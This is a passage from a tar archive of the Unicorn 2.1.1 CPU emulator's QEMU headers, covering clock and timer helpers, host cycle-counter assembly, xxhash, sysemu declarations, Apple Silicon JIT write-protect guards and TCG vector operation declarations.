a nanosecond timeout value (or -1) to * a millisecond value (or -1), always rounding up. * * Returns: millisecond timeout value */ int qemu_timeout_ns_to_ms(int64_t ns); /** * qemu_soonest_timeout: * @timeout1: first timeout in nanoseconds (or -1 for infinite) * @timeout2: second timeout in nanoseconds (or -1 for infinite) * * Calculates the soonest of two timeout values. -1 means infinite, which * is later than any other value. * * Returns: soonest timeout value in nanoseconds (or -1 for infinite) */ static inline int64_t qemu_soonest_timeout(int64_t timeout1, int64_t timeout2) { /* we can abuse the fact that -1 (which means infinite) is a maximal * value when cast to unsigned. As this is disgusting, it's kept in * one inline function. */ return ((uint64_t) timeout1 < (uint64_t) timeout2) ? timeout1 : timeout2; } /** * initclocks: * * Initialise the clock & timer infrastructure */ void init_clocks(QEMUTimerListNotifyCB *notify_cb); int64_t cpu_get_ticks(void); /* Caller must hold BQL */ void cpu_enable_ticks(void); /* Caller must hold BQL */ void cpu_disable_ticks(void); static inline int64_t get_max_clock_jump(void) { /* This should be small enough to prevent excessive interrupts from being * generated by the RTC on clock jumps, but large enough to avoid frequent * unnecessary resets in idle VMs. */ return 60 * NANOSECONDS_PER_SECOND; } /* * Low level clock functions */ #ifdef _WIN32 static inline int64_t get_clock_realtime(void) { // code from https://stackoverflow.com/questions/10905892/equivalent-of-gettimeday-for-windows // >>>>>>>>> const uint64_t EPOCH = ((uint64_t)116444736000000000ULL); long tv_sec, tv_usec; SYSTEMTIME system_time; FILETIME file_time; uint64_t time; GetSystemTime(&system_time); SystemTimeToFileTime(&system_time, &file_time); time = ((uint64_t)file_time.dwLowDateTime); time += ((uint64_t)file_time.dwHighDateTime) << 32; tv_sec = (long)((time - EPOCH) / 10000000L); tv_usec = (long)(system_time.wMilliseconds * 1000); // <<<<<<<<< return tv_sec * 1000000000LL + (tv_usec * 1000); } #else /* get host real time in nanosecond */ static inline int64_t get_clock_realtime(void) { struct timeval tv; gettimeofday(&tv, NULL); return tv.tv_sec * 1000000000LL + (tv.tv_usec * 1000); } #endif /* Warning: don't insert tracepoints into these functions, they are also used by simpletrace backend and tracepoints would cause an infinite recursion! */ #ifdef _WIN32 extern int64_t clock_freq; static inline int64_t get_clock(void) { LARGE_INTEGER ti; QueryPerformanceCounter(&ti); return muldiv64(ti.QuadPart, NANOSECONDS_PER_SECOND, clock_freq); } #else extern int use_rt_clock; static inline int64_t get_clock(void) { if (use_rt_clock) { struct timespec ts; clock_gettime(CLOCK_MONOTONIC, &ts); return ts.tv_sec * 1000000000LL + ts.tv_nsec; } else { /* XXX: using gettimeofday leads to problems if the date changes, so it should be avoided. */ return get_clock_realtime(); } } #endif /* icount */ int64_t cpu_get_icount_raw(void); int64_t cpu_get_icount(void); int64_t cpu_get_clock(void); int64_t cpu_icount_to_ns(int64_t icount); void cpu_update_icount(CPUState *cpu); /*******************************************/ /* host CPU ticks (if available) */ #if defined(_ARCH_PPC) static inline int64_t cpu_get_host_ticks(void) { int64_t retval; #ifdef _ARCH_PPC64 /* This reads timebase in one 64bit go and includes Cell workaround from: http://ozlabs.org/pipermail/linuxppc-dev/2006-October/027052.html */ __asm__ __volatile__ ("mftb %0\n\t" "cmpwi %0,0\n\t" "beq- $-8" : "=r" (retval)); #else /* http://ozlabs.org/pipermail/linuxppc-dev/1999-October/003889.html */ unsigned long junk; __asm__ __volatile__ ("mfspr %1,269\n\t" /* mftbu */ "mfspr %L0,268\n\t" /* mftb */ "mfspr %0,269\n\t" /* mftbu */ "cmpw %0,%1\n\t" "bne $-16" : "=r" (retval), "=r" (junk)); #endif return retval; } #elif defined(__i386__) static inline int64_t cpu_get_host_ticks(void) { #ifdef _MSC_VER return __rdtsc(); #else int64_t val; asm volatile ("rdtsc" : "=A" (val)); return val; #endif } #elif defined(__x86_64__) static inline int64_t cpu_get_host_ticks(void) { #ifdef _MSC_VER return __rdtsc(); #else uint32_t low,high; int64_t val; asm volatile("rdtsc" : "=a" (low), "=d" (high)); val = high; val <<= 32; val |= low; return val; #endif } #elif defined(__hppa__) static inline int64_t cpu_get_host_ticks(void) { int val; asm volatile ("mfctl %%cr16, %0" : "=r"(val)); return val; } #elif defined(__s390__) static inline int64_t cpu_get_host_ticks(void) { int64_t val; asm volatile("stck 0(%1)" : "=m" (val) : "a" (&val) : "cc"); return val; } #elif defined(__sparc__) static inline int64_t cpu_get_host_ticks (void) { #if defined(_LP64) uint64_t rval; asm volatile("rd %%tick,%0" : "=r"(rval)); return rval; #else /* We need an %o or %g register for this. For recent enough gcc there is an "h" constraint for that. Don't bother with that. */ union { uint64_t i64; struct { uint32_t high; uint32_t low; } i32; } rval; asm volatile("rd %%tick,%%g1; srlx %%g1,32,%0; mov %%g1,%1" : "=r"(rval.i32.high), "=r"(rval.i32.low) : : "g1"); return rval.i64; #endif } #elif defined(__mips__) && \ ((defined(__mips_isa_rev) && __mips_isa_rev >= 2) || defined(__linux__)) /* * binutils wants to use rdhwr only on mips32r2 * but as linux kernel emulate it, it's fine * to use it. * */ #define MIPS_RDHWR(rd, value) { \ __asm__ __volatile__ (".set push\n\t" \ ".set mips32r2\n\t" \ "rdhwr %0, "rd"\n\t" \ ".set pop" \ : "=r" (value)); \ } static inline int64_t cpu_get_host_ticks(void) { /* On kernels >= 2.6.25 rdhwr <reg>, $2 and $3 are emulated */ uint32_t count; static uint32_t cyc_per_count = 0; if (!cyc_per_count) { MIPS_RDHWR("$3", cyc_per_count); } MIPS_RDHWR("$2", count); return (int64_t)(count * cyc_per_count); } #elif defined(__alpha__) static inline int64_t cpu_get_host_ticks(void) { uint64_t cc; uint32_t cur, ofs; asm volatile("rpcc %0" : "=r"(cc)); cur = cc; ofs = cc >> 32; return cur - ofs; } #else /* The host CPU doesn't have an easily accessible cycle counter. Just return a monotonically increasing value. This will be totally wrong, but hopefully better than nothing. */ static inline int64_t cpu_get_host_ticks(void) { return get_clock(); } #endif void init_get_clock(void); #endif ��������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/typedefs.h����������������������������������������������������������0000664�0000000�0000000�00000003120�14675241067�0020535�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_TYPEDEFS_H #define QEMU_TYPEDEFS_H /* * This header is for selectively avoiding #include just to get a * typedef name. * * Declaring a typedef name in its "obvious" place can result in * inclusion cycles, in particular for complete struct and union * types that need more types for their members. It can also result * in headers pulling in many more headers, slowing down builds. * * You can break such cycles and unwanted dependencies by declaring * the typedef name here. * * For struct types used in only a few headers, judicious use of the * struct tag instead of the typedef name is commonly preferable. */ /* * Incomplete struct types * Please keep this list in case-insensitive alphabetical order. */ typedef struct AddressSpace AddressSpace; typedef struct CPUAddressSpace CPUAddressSpace; typedef struct CPUState CPUState; typedef struct FlatView FlatView; typedef struct IOMMUMemoryRegion IOMMUMemoryRegion; typedef struct MemoryListener MemoryListener; typedef struct MemoryMappingList MemoryMappingList; typedef struct MemoryRegion MemoryRegion; typedef struct MemoryRegionCache MemoryRegionCache; typedef struct MemoryRegionSection MemoryRegionSection; typedef struct QEMUTimer QEMUTimer; typedef struct QEMUTimerListGroup QEMUTimerListGroup; typedef struct RAMBlock RAMBlock; typedef struct Range Range; /* * Pointer types * Such typedefs should be limited to cases where the typedef's users * are oblivious of its "pointer-ness". * Please keep this list in case-insensitive alphabetical order. */ typedef struct IRQState *qemu_irq; #endif /* QEMU_TYPEDEFS_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/qemu/units.h�������������������������������������������������������������0000664�0000000�0000000�00000000734�14675241067�0020064�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * IEC binary prefixes definitions * * Copyright (C) 2015 Nikunj A Dadhania, IBM Corporation * Copyright (C) 2018 Philippe Mathieu-Daudé <f4bug@amsat.org> * * SPDX-License-Identifier: GPL-2.0-or-later */ #ifndef QEMU_UNITS_H #define QEMU_UNITS_H #define KiB (INT64_C(1) << 10) #define MiB (INT64_C(1) << 20) #define GiB (INT64_C(1) << 30) #define TiB (INT64_C(1) << 40) #define PiB (INT64_C(1) << 50) #define EiB (INT64_C(1) << 60) #endif ������������������������������������unicorn-2.1.1/qemu/include/qemu/xxhash.h������������������������������������������������������������0000664�0000000�0000000�00000007154�14675241067�0020230�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * xxHash - Fast Hash algorithm * Copyright (C) 2012-2016, Yann Collet * * BSD 2-Clause License (http://www.opensource.org/licenses/bsd-license.php) * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are * met: * * + Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * + Redistributions in binary form must reproduce the above * copyright notice, this list of conditions and the following disclaimer * in the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR * A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT * OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT * LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. * * You can contact the author at : * - xxHash source repository : https://github.com/Cyan4973/xxHash */ #ifndef QEMU_XXHASH_H #define QEMU_XXHASH_H #include "qemu/bitops.h" #define PRIME32_1 2654435761U #define PRIME32_2 2246822519U #define PRIME32_3 3266489917U #define PRIME32_4 668265263U #define PRIME32_5 374761393U #define QEMU_XXHASH_SEED 1 /* * xxhash32, customized for input variables that are not guaranteed to be * contiguous in memory. */ static inline uint32_t qemu_xxhash7(uint64_t ab, uint64_t cd, uint32_t e, uint32_t f, uint32_t g) { #ifdef _WIN32 uint64_t v1x = QEMU_XXHASH_SEED; v1x += PRIME32_1; v1x += PRIME32_2; uint32_t v1 = v1x; #else uint32_t v1 = QEMU_XXHASH_SEED + PRIME32_1 + PRIME32_2; #endif uint32_t v2 = QEMU_XXHASH_SEED + PRIME32_2; uint32_t v3 = QEMU_XXHASH_SEED + 0; uint32_t v4 = QEMU_XXHASH_SEED - PRIME32_1; uint32_t a = ab; uint32_t b = ab >> 32; uint32_t c = cd; uint32_t d = cd >> 32; uint32_t h32; v1 += a * PRIME32_2; v1 = rol32(v1, 13); v1 *= PRIME32_1; v2 += b * PRIME32_2; v2 = rol32(v2, 13); v2 *= PRIME32_1; v3 += c * PRIME32_2; v3 = rol32(v3, 13); v3 *= PRIME32_1; v4 += d * PRIME32_2; v4 = rol32(v4, 13); v4 *= PRIME32_1; h32 = rol32(v1, 1) + rol32(v2, 7) + rol32(v3, 12) + rol32(v4, 18); h32 += 28; h32 += e * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 += f * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 += g * PRIME32_3; h32 = rol32(h32, 17) * PRIME32_4; h32 ^= h32 >> 15; h32 *= PRIME32_2; h32 ^= h32 >> 13; h32 *= PRIME32_3; h32 ^= h32 >> 16; return h32; } static inline uint32_t qemu_xxhash2(uint64_t ab) { return qemu_xxhash7(ab, 0, 0, 0, 0); } static inline uint32_t qemu_xxhash4(uint64_t ab, uint64_t cd) { return qemu_xxhash7(ab, cd, 0, 0, 0); } static inline uint32_t qemu_xxhash5(uint64_t ab, uint64_t cd, uint32_t e) { return qemu_xxhash7(ab, cd, e, 0, 0); } static inline uint32_t qemu_xxhash6(uint64_t ab, uint64_t cd, uint32_t e, uint32_t f) { return qemu_xxhash7(ab, cd, e, f, 0); } #endif /* QEMU_XXHASH_H */ ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0017123�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/cpus.h������������������������������������������������������������0000664�0000000�0000000�00000001111�14675241067�0020240�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef QEMU_CPUS_H #define QEMU_CPUS_H #include "qemu/timer.h" #include "hw/core/cpu.h" /* cpus.c */ bool qemu_in_vcpu_thread(void); void qemu_init_cpu_loop(void); void resume_all_vcpus(struct uc_struct* uc); void cpu_stop_current(struct uc_struct* uc); void cpu_ticks_init(void); /* Unblock cpu */ void qemu_cpu_kick_self(void); void cpu_synchronize_all_states(void); void cpu_synchronize_all_post_reset(void); void cpu_synchronize_all_post_init(void); void cpu_synchronize_all_pre_loadvm(void); void qtest_clock_warp(int64_t dest); void list_cpus(const char *optarg); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/memory_mapping.h��������������������������������������������������0000664�0000000�0000000�00000002320�14675241067�0022314�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU memory mapping * * Copyright Fujitsu, Corp. 2011, 2012 * * Authors: * Wen Congyang <wency@cn.fujitsu.com> * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. * */ #ifndef MEMORY_MAPPING_H #define MEMORY_MAPPING_H #include "qemu/queue.h" #include "exec/cpu-defs.h" #include "exec/memory.h" /* The physical and virtual address in the memory mapping are contiguous. */ typedef struct MemoryMapping { hwaddr phys_addr; target_ulong virt_addr; ram_addr_t length; QTAILQ_ENTRY(MemoryMapping) next; } MemoryMapping; struct MemoryMappingList { unsigned int num; MemoryMapping *last_mapping; QTAILQ_HEAD(, MemoryMapping) head; }; /* * add or merge the memory region [phys_addr, phys_addr + length) into the * memory mapping's list. The region's virtual address starts with virt_addr, * and is contiguous. The list is sorted by phys_addr. */ void memory_mapping_list_add_merge_sorted(MemoryMappingList *list, hwaddr phys_addr, hwaddr virt_addr, ram_addr_t length); #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/os-win32.h��������������������������������������������������������0000664�0000000�0000000�00000004507�14675241067�0020663�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * win32 specific declarations * * Copyright (c) 2003-2008 Fabrice Bellard * Copyright (c) 2010 Jes Sorensen <Jes.Sorensen@redhat.com> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef QEMU_OS_WIN32_H #define QEMU_OS_WIN32_H #include <winsock2.h> #include <windows.h> #include <winnt.h> // For vectorized handler #include <ws2tcpip.h> #if defined(_WIN64) /* On w64, setjmp is implemented by _setjmp which needs a second parameter. * If this parameter is NULL, longjump does no stack unwinding. * That is what we need for QEMU. Passing the value of register rsp (default) * lets longjmp try a stack unwinding which will crash with generated code. */ #if defined(_MSC_VER) // MSVC // See qemu/include/utils/setjmp-wrapper-win32.asm for details. extern int _setjmp_wrapper(jmp_buf); #undef setjmp #define setjmp(env) _setjmp_wrapper(env) #else // MingW #undef setjmp #define setjmp(env) _setjmp(env, NULL) #endif #endif /* QEMU uses sigsetjmp()/siglongjmp() as the portable way to specify * "longjmp and don't touch the signal masks". Since we know that the * savemask parameter will always be zero we can safely define these * in terms of setjmp/longjmp on Win32. */ #define sigjmp_buf jmp_buf #define sigsetjmp(env, savemask) setjmp(env) #define siglongjmp(env, val) longjmp(env, val) int getpagesize(void); #endif �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/sysemu.h����������������������������������������������������������0000664�0000000�0000000�00000000247�14675241067�0020624�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#ifndef SYSEMU_H #define SYSEMU_H struct uc_struct; void qemu_system_reset_request(struct uc_struct*); void qemu_system_shutdown_request(struct uc_struct*); #endif ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/sysemu/tcg.h�������������������������������������������������������������0000664�0000000�0000000�00000000543�14675241067�0020053�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * QEMU TCG support * * This work is licensed under the terms of the GNU GPL, version 2 or later. * See the COPYING file in the top-level directory. */ #ifndef SYSEMU_TCG_H #define SYSEMU_TCG_H #include <stdbool.h> #include <stdint.h> //#include "uc_priv.h" struct uc_struct; void tcg_exec_init(struct uc_struct *uc, uint32_t tb_size); #endif �������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/���������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0016353�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-apple-jit.h������������������������������������������������������0000664�0000000�0000000�00000006666�14675241067�0021202�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Apple Silicon APRR functions for JIT handling * * Copyright (c) 2020 osy * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ /* * Credits to: https://siguza.github.io/APRR/ * Reversed from /usr/lib/system/libsystem_pthread.dylib */ #ifndef TCG_APPLE_JIT_H #define TCG_APPLE_JIT_H #if defined(__APPLE__) && defined(HAVE_PTHREAD_JIT_PROTECT) && defined(HAVE_SPRR) && (defined(__arm__) || defined(__aarch64__)) /* write protect enable = write disable */ static inline void jit_write_protect(int enabled) { return pthread_jit_write_protect_np(enabled); } // Returns the S3_6_c15_c1_5 register's value // Taken from // https://stackoverflow.com/questions/70019553/lldb-how-to-read-the-permissions-of-a-memory-region-for-a-thread // https://blog.svenpeter.dev/posts/m1_sprr_gxf/ static inline uint64_t read_sprr_perm(void) { uint64_t v; __asm__ __volatile__("isb sy\n" "mrs %0, S3_6_c15_c1_5\n" : "=r"(v)::"memory"); return v; } __attribute__((unused)) static inline uint8_t thread_mask() { uint64_t v = read_sprr_perm(); return (v >> 20) & 3; } __attribute__((unused)) static inline bool thread_writeable() { return thread_mask() == 3; } __attribute__((unused)) static inline bool thread_executable() { return thread_mask() == 1; } #define JIT_CALLBACK_GUARD(x) \ { \ bool executable = uc->current_executable; \ assert (executable == thread_executable()); \ x; \ if (executable != thread_executable()) { \ jit_write_protect(executable); \ } \ } \ #define JIT_CALLBACK_GUARD_VAR(var, x) \ { \ bool executable = uc->current_executable; \ assert (executable == thread_executable()); \ var = x; \ if (executable != thread_executable()) { \ jit_write_protect(executable); \ } \ } \ #else /* defined(__aarch64__) && defined(CONFIG_DARWIN) */ static inline void jit_write_protect(int enabled) { return; } #define JIT_CALLBACK_GUARD(x) \ { \ (void)uc; \ x; \ } \ #define JIT_CALLBACK_GUARD_VAR(var, x) \ { \ (void)uc; \ var = x; \ } \ #endif #endif /* define TCG_APPLE_JIT_H */��������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-gvec-desc.h������������������������������������������������������0000664�0000000�0000000�00000003422�14675241067�0021140�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic vector operation descriptor * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TCG_TCG_GVEC_DESC_H #define TCG_TCG_GVEC_DESC_H /* ??? These bit widths are set for ARM SVE, maxing out at 256 byte vectors. */ #define SIMD_OPRSZ_SHIFT 0 #define SIMD_OPRSZ_BITS 5 #define SIMD_MAXSZ_SHIFT (SIMD_OPRSZ_SHIFT + SIMD_OPRSZ_BITS) #define SIMD_MAXSZ_BITS 5 #define SIMD_DATA_SHIFT (SIMD_MAXSZ_SHIFT + SIMD_MAXSZ_BITS) #define SIMD_DATA_BITS (32 - SIMD_DATA_SHIFT) /* Create a descriptor from components. */ uint32_t simd_desc(uint32_t oprsz, uint32_t maxsz, int32_t data); /* Extract the operation size from a descriptor. */ static inline intptr_t simd_oprsz(uint32_t desc) { return (extract32(desc, SIMD_OPRSZ_SHIFT, SIMD_OPRSZ_BITS) + 1) * 8; } /* Extract the max vector size from a descriptor. */ static inline intptr_t simd_maxsz(uint32_t desc) { return (extract32(desc, SIMD_MAXSZ_SHIFT, SIMD_MAXSZ_BITS) + 1) * 8; } /* Extract the operation-specific data from a descriptor. */ static inline int32_t simd_data(uint32_t desc) { return sextract32(desc, SIMD_DATA_SHIFT, SIMD_DATA_BITS); } #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/include/tcg/tcg-mo.h�������������������������������������������������������������0000664�0000000�0000000�00000003754�14675241067�0017723�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Tiny Code Generator for QEMU * * Copyright (c) 2008 Fabrice Bellard * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL * THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN * THE SOFTWARE. */ #ifndef TCG_MO_H #define TCG_MO_H typedef enum { /* Used to indicate the type of accesses on which ordering is to be ensured. Modeled after SPARC barriers. This is of the form TCG_MO_A_B where A is before B in program order. */ TCG_MO_LD_LD = 0x01, TCG_MO_ST_LD = 0x02, TCG_MO_LD_ST = 0x04, TCG_MO_ST_ST = 0x08, TCG_MO_ALL = 0x0F, /* OR of the above */ /* Used to indicate the kind of ordering which is to be ensured by the instruction. These types are derived from x86/aarch64 instructions. It should be noted that these are different from C11 semantics. */ TCG_BAR_LDAQ = 0x10, /* Following ops will not come forward */ TCG_BAR_STRL = 0x20, /* Previous ops will not be delayed */ TCG_BAR_SC = 0x30, /* No ops cross barrier; OR of the above */ } TCGBar; #endif /* TCG_MO_H */ ��������������������unicorn-2.1.1/qemu/include/tcg/tcg-op-gvec.h��������������������������������������������������������0000664�0000000�0000000�00000047560�14675241067�0020653�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Generic vector operation expansion * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef TCG_TCG_OP_GVEC_H #define TCG_TCG_OP_GVEC_H /* * "Generic" vectors. All operands are given as offsets from ENV, * and therefore cannot also be allocated via tcg_global_mem_new_*. * OPRSZ is the byte size of the vector upon which the operation is performed. * MAXSZ is the byte size of the full vector; bytes beyond OPSZ are cleared. * * All sizes must be 8 or any multiple of 16. * When OPRSZ is 8, the alignment may be 8, otherwise must be 16. * Operands may completely, but not partially, overlap. */ /* Expand a call to a gvec-style helper, with pointers to two vector operands, and a descriptor (see tcg-gvec-desc.h). */ typedef void gen_helper_gvec_2(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_2_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2 *fn); /* Similarly, passing an extra data value. */ typedef void gen_helper_gvec_2i(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_i64, TCGv_i32); void tcg_gen_gvec_2i_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2i *fn); /* Similarly, passing an extra pointer (e.g. env or float_status). */ typedef void gen_helper_gvec_2_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_2_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2_ptr *fn); /* Similarly, with three vector operands. */ typedef void gen_helper_gvec_3(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_3_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3 *fn); /* Similarly, with four vector operands. */ typedef void gen_helper_gvec_4(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_4_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4 *fn); /* Similarly, with five vector operands. */ typedef void gen_helper_gvec_5(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_5_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t xofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5 *fn); typedef void gen_helper_gvec_3_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_ptr, TCGv_i32); void tcg_gen_gvec_3_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3_ptr *fn); typedef void gen_helper_gvec_4_ptr(TCGContext *, TCGv_ptr, TCGv_ptr, 